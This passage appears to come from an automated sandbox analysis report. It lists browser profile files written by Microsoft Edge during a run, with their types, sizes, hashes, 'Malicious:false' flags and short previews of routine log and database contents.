                                                                                                                                                                                                                                                                          SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):356
                                                                                                                                                                                                                                                                          Entropy (8bit):5.096032413250271
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:B7L+q2PN723oH+Tcwt7Uh2ghZIFUt8UHWRsG11Zmw+UHWRsGjLVkwON723oH+Tcz:B7L+vVaYebIhHh2FUt8UHWRsm/+UHWRw
                                                                                                                                                                                                                                                                          MD5:0612FEAF0708E223126217728628156F
                                                                                                                                                                                                                                                                          SHA1:7BDEA2F62E00E0CEEB737541E580CFFAF98410E2
                                                                                                                                                                                                                                                                          SHA-256:17FE50D4B42B248B026E686070F186A79CE051A6956A71F42B2E463D649D27DC
                                                                                                                                                                                                                                                                          SHA-512:4D0AB9FE6D0046D840F56448610E856588CE2C92153F937B79669AA5F66E529F6EEB5F44BDF70F837F073FCD5DA143D231A6E2629671A5615376388F6742C040
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:04.707 137c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/27-01:11:04.834 137c Recovering log #3.2024/12/27-01:11:04.834 137c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):356
                                                                                                                                                                                                                                                                          Entropy (8bit):5.096032413250271
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:B7L+q2PN723oH+Tcwt7Uh2ghZIFUt8UHWRsG11Zmw+UHWRsGjLVkwON723oH+Tcz:B7L+vVaYebIhHh2FUt8UHWRsm/+UHWRw
                                                                                                                                                                                                                                                                          MD5:0612FEAF0708E223126217728628156F
                                                                                                                                                                                                                                                                          SHA1:7BDEA2F62E00E0CEEB737541E580CFFAF98410E2
                                                                                                                                                                                                                                                                          SHA-256:17FE50D4B42B248B026E686070F186A79CE051A6956A71F42B2E463D649D27DC
                                                                                                                                                                                                                                                                          SHA-512:4D0AB9FE6D0046D840F56448610E856588CE2C92153F937B79669AA5F66E529F6EEB5F44BDF70F837F073FCD5DA143D231A6E2629671A5615376388F6742C040
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:04.707 137c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/27-01:11:04.834 137c Recovering log #3.2024/12/27-01:11:04.834 137c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):435
                                                                                                                                                                                                                                                                          Entropy (8bit):5.2053845045341
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:ByQIOvVaYebvqBQFUt8Ua9/+UwD5OaYebvqBvJ:MnMVaYebvZg84OaYebvk
                                                                                                                                                                                                                                                                          MD5:350D4B3E97417DFEFDB8000554A61E08
                                                                                                                                                                                                                                                                          SHA1:D05BC8E73F8DDA6984A05C4DC43015C579081BAC
                                                                                                                                                                                                                                                                          SHA-256:B64CBCECD284E8276018722E13BAA456C95CB7F56A5D969A3E3ADAB5DDF961ED
                                                                                                                                                                                                                                                                          SHA-512:F4FDDB46EA1A789F11851ADCF3E6EBA9DE1B809548EB95652864204E58089F774C955003FEB4FCF8E3A31AA3E21FA54738B725E56B7A47A1A57CFA6DE67AAB31
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:05.509 514 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/27-01:11:05.510 514 Recovering log #3.2024/12/27-01:11:05.518 514 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):435
                                                                                                                                                                                                                                                                          Entropy (8bit):5.2053845045341
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:ByQIOvVaYebvqBQFUt8Ua9/+UwD5OaYebvqBvJ:MnMVaYebvZg84OaYebvk
                                                                                                                                                                                                                                                                          MD5:350D4B3E97417DFEFDB8000554A61E08
                                                                                                                                                                                                                                                                          SHA1:D05BC8E73F8DDA6984A05C4DC43015C579081BAC
                                                                                                                                                                                                                                                                          SHA-256:B64CBCECD284E8276018722E13BAA456C95CB7F56A5D969A3E3ADAB5DDF961ED
                                                                                                                                                                                                                                                                          SHA-512:F4FDDB46EA1A789F11851ADCF3E6EBA9DE1B809548EB95652864204E58089F774C955003FEB4FCF8E3A31AA3E21FA54738B725E56B7A47A1A57CFA6DE67AAB31
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:05.509 514 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/27-01:11:05.510 514 Recovering log #3.2024/12/27-01:11:05.518 514 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):36864
                                                                                                                                                                                                                                                                          Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                          MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                          SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                          SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                          SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\f7648235-79ba-4f80-8ba2-b49ed66647e8.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):332
                                                                                                                                                                                                                                                                          Entropy (8bit):5.195340065955111
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BHWTx+q2PN723oH+TcwtpIFUt8UHqHZZmw+UHqHNVkwON723oH+Tcwta/WLJ:BHWgvVaYebmFUt8UHq5/+UHqT5OaYeb7
                                                                                                                                                                                                                                                                          MD5:B94327D7682CC4F28952D9B200EBC586
                                                                                                                                                                                                                                                                          SHA1:E5CDFDAD30A38C8933A08E7E95DFEA71DFC7BA79
                                                                                                                                                                                                                                                                          SHA-256:9E08F97E6C9C159F57F5C3DBD66754436080750F601B3CC24A9335138FEF17AE
                                                                                                                                                                                                                                                                          SHA-512:1F6B7586AF817B102B95296B6618A275EC9A7EA6DCEF9F484F2C75AF47502463BEFA54BFDD3A0903CB5CB2CE1CF28C8634836AB00E04229B12B405D6C0C15630
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:04.836 1388 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/27-01:11:04.845 1388 Recovering log #3.2024/12/27-01:11:04.845 1388 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):332
                                                                                                                                                                                                                                                                          Entropy (8bit):5.195340065955111
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BHWTx+q2PN723oH+TcwtpIFUt8UHqHZZmw+UHqHNVkwON723oH+Tcwta/WLJ:BHWgvVaYebmFUt8UHq5/+UHqT5OaYeb7
                                                                                                                                                                                                                                                                          MD5:B94327D7682CC4F28952D9B200EBC586
                                                                                                                                                                                                                                                                          SHA1:E5CDFDAD30A38C8933A08E7E95DFEA71DFC7BA79
                                                                                                                                                                                                                                                                          SHA-256:9E08F97E6C9C159F57F5C3DBD66754436080750F601B3CC24A9335138FEF17AE
                                                                                                                                                                                                                                                                          SHA-512:1F6B7586AF817B102B95296B6618A275EC9A7EA6DCEF9F484F2C75AF47502463BEFA54BFDD3A0903CB5CB2CE1CF28C8634836AB00E04229B12B405D6C0C15630
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:04.836 1388 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/27-01:11:04.845 1388 Recovering log #3.2024/12/27-01:11:04.845 1388 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):196608
                                                                                                                                                                                                                                                                          Entropy (8bit):1.2676416689747718
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:L/2qOB1nxCkMXSA1LyKOMq+8iP5GDHP/0jMVumw:Kq+n0JX91LyKOMq+8iP5GLP/01
                                                                                                                                                                                                                                                                          MD5:9C72978D62707A972C39A9C1314D4C4C
                                                                                                                                                                                                                                                                          SHA1:18C5BDD0D83CDBF89F1C83C5B0A02376E8F9CF36
                                                                                                                                                                                                                                                                          SHA-256:36AC5B2F92DFD04A55E7AB76FCB5FE6C1641B42861D62B45F88368A9ED6CC67E
                                                                                                                                                                                                                                                                          SHA-512:831EBEE8D45358AEBCFCBD72939116BA5509434E18C640DADF576CC7DEB9C26D2681D74BA42BBA2ABE446EDBC52BD1B670DE462078DA437DA788367CF433A179
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......[...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\f137d5a2-bd2a-46e7-8860-0e4b310712da.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                                                          Entropy (8bit):0.053340852838337546
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:GtStut/nB9uIPStut/nB9uQR9XCChslotGLNl0ml/Vl/XoQXEl:Mt/jumt/juQLpEjVl/PvoQ
                                                                                                                                                                                                                                                                          MD5:0260AE683A2E5C08B8149A334FE191AF
                                                                                                                                                                                                                                                                          SHA1:5D495C7CF6C55643903FA7306B0BFD3369E7CF46
                                                                                                                                                                                                                                                                          SHA-256:6F20E20464DACB34691A7AE2D2BA9A21BB3B688A513C620A9B1E9ADFC3E47D73
                                                                                                                                                                                                                                                                          SHA-512:B2134406E210F07AB3DDED047A50182786C17EE33FF449B6BBC5275758ED12EE7D086CDD1E7EA0A048B5D42B2F89F8210A42125073ECCC9886824CAA2C9217E5
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:..-.....................rJ.|5.|.$J...V.....k$r*...-.....................rJ.|5.|.$J...V.....k$r*.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):86552
                                                                                                                                                                                                                                                                          Entropy (8bit):0.87053602712582
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:eqzxjlO+H1qcbX+En9VAKAFXX+pRw2VAKAFXX+6xOqVAKAFXX+GnUYVAKAFXX+aV:e6xLV0xNs/cNswO5NshNsaV
                                                                                                                                                                                                                                                                          MD5:550E757D140C4C4AC0299ECE917C0CC8
                                                                                                                                                                                                                                                                          SHA1:F1262B7ECDECB39CB7D6FBBCB26C5A7852A76808
                                                                                                                                                                                                                                                                          SHA-256:306575ED21EF7EBB48C8737CB7F5A8AF3028E2C788FB795AAAD02A27448AB52C
                                                                                                                                                                                                                                                                          SHA-512:D3A49469B37F26F11ECB37DA1D1C6EEFB2C081FEAC96AD3D88F451AA0DE88E35349D4E6465642A3C89814B0433D11F96758A436939E4986419B6849CFA017E33
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:7....-..........$J...V....M7'.z.........$J...V..h.IR..4.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                          Size (bytes):620
                                                                                                                                                                                                                                                                          Entropy (8bit):3.2854596157347293
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:p9lc8QyOuuuuuuuuuuuuuuuuuuuuuCKgllxtbX:pHayjgl
                                                                                                                                                                                                                                                                          MD5:1B0ABF26ECB7AD23A3129AEA6117AD86
                                                                                                                                                                                                                                                                          SHA1:7278A9A8030A5335C1E75DD25B1E7AAB512C6559
                                                                                                                                                                                                                                                                          SHA-256:9BF23E8D27FCD6BBBD54D5F945E73D6BD4ACE7F18473F8C2516C640D7615FF15
                                                                                                                                                                                                                                                                          SHA-512:17720210FC84B811762D3DB360BDF60F40B61B0C61DC528E2674DC6AFE0BDD8BE96B125AF7646991D36D55C9F908B646785CA538B99398E1A9C716C6A6FE7D3E
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:A..r.................20_1_1...1.,U.................20_1_1...1..$.0................39_config..........6.....n ...1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=.................HS;...............#38_h.......6.Z..W.F.....~.......~............V.e................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):328
                                                                                                                                                                                                                                                                          Entropy (8bit):5.217600499855756
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BGGjM+q2PN723oH+TcwtfrK+IFUt8UGpmZmw+UGppMVkwON723oH+TcwtfrUeLJ:BbjM+vVaYeb23FUt8UJ/+UcMV5OaYeb5
                                                                                                                                                                                                                                                                          MD5:3B250B897058F788C913A7E7E99FB75D
                                                                                                                                                                                                                                                                          SHA1:21BE1F0E72327A0B031DBB91E660F36206CD02C2
                                                                                                                                                                                                                                                                          SHA-256:907F808866FEEEC0DBC9AC21BA32C9BCFB2F01B413558F0164261CE3A9857F9D
                                                                                                                                                                                                                                                                          SHA-512:5338FF22CB6D6009137B55B595AD7D0B663E000149792DFA01D445F2E504139F5E64F703CB142DAB5E9F15AA904654A705244E4FC57C418067D5A442EC85C4D7
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:05.263 138c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/27-01:11:05.264 138c Recovering log #3.2024/12/27-01:11:05.264 138c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):328
                                                                                                                                                                                                                                                                          Entropy (8bit):5.217600499855756
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BGGjM+q2PN723oH+TcwtfrK+IFUt8UGpmZmw+UGppMVkwON723oH+TcwtfrUeLJ:BbjM+vVaYeb23FUt8UJ/+UcMV5OaYeb5
                                                                                                                                                                                                                                                                          MD5:3B250B897058F788C913A7E7E99FB75D
                                                                                                                                                                                                                                                                          SHA1:21BE1F0E72327A0B031DBB91E660F36206CD02C2
                                                                                                                                                                                                                                                                          SHA-256:907F808866FEEEC0DBC9AC21BA32C9BCFB2F01B413558F0164261CE3A9857F9D
                                                                                                                                                                                                                                                                          SHA-512:5338FF22CB6D6009137B55B595AD7D0B663E000149792DFA01D445F2E504139F5E64F703CB142DAB5E9F15AA904654A705244E4FC57C418067D5A442EC85C4D7
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:05.263 138c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/27-01:11:05.264 138c Recovering log #3.2024/12/27-01:11:05.264 138c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):816
                                                                                                                                                                                                                                                                          Entropy (8bit):4.0647916882227655
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ySxs:G0nYUtypD32m3yWlIZMBA5NgKIvB8Sxs
                                                                                                                                                                                                                                                                          MD5:3BE72D8D40752B3A97028FDB2931FABA
                                                                                                                                                                                                                                                                          SHA1:A27EA4726857A948F0A4B074062B674469A9A371
                                                                                                                                                                                                                                                                          SHA-256:3C18553C8C3F7E801855F3579AC57F3C156D783BBA27FB35C6D2FB6CB89BD902
                                                                                                                                                                                                                                                                          SHA-512:8EBD4D6980BB7796615217E72BC65953C920B68B9259341CD52858C1E889EC90339E2A304FE0C971D6C6EF9AFC4A00CFB3E5CC89C7B2DF8737A0C7EC241BDADC
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... ......................__global... .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):346
                                                                                                                                                                                                                                                                          Entropy (8bit):5.18872718047005
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BGzM+q2PN723oH+TcwtfrzAdIFUt8UGlNXZmw+UGlNqMVkwON723oH+TcwtfrzId:B4M+vVaYeb9FUt8UO/+UxMV5OaYeb2J
                                                                                                                                                                                                                                                                          MD5:81CF18BFC18610405013FC004B0E036C
                                                                                                                                                                                                                                                                          SHA1:D3BB054452BD20F33873F9697743329711FE8B2F
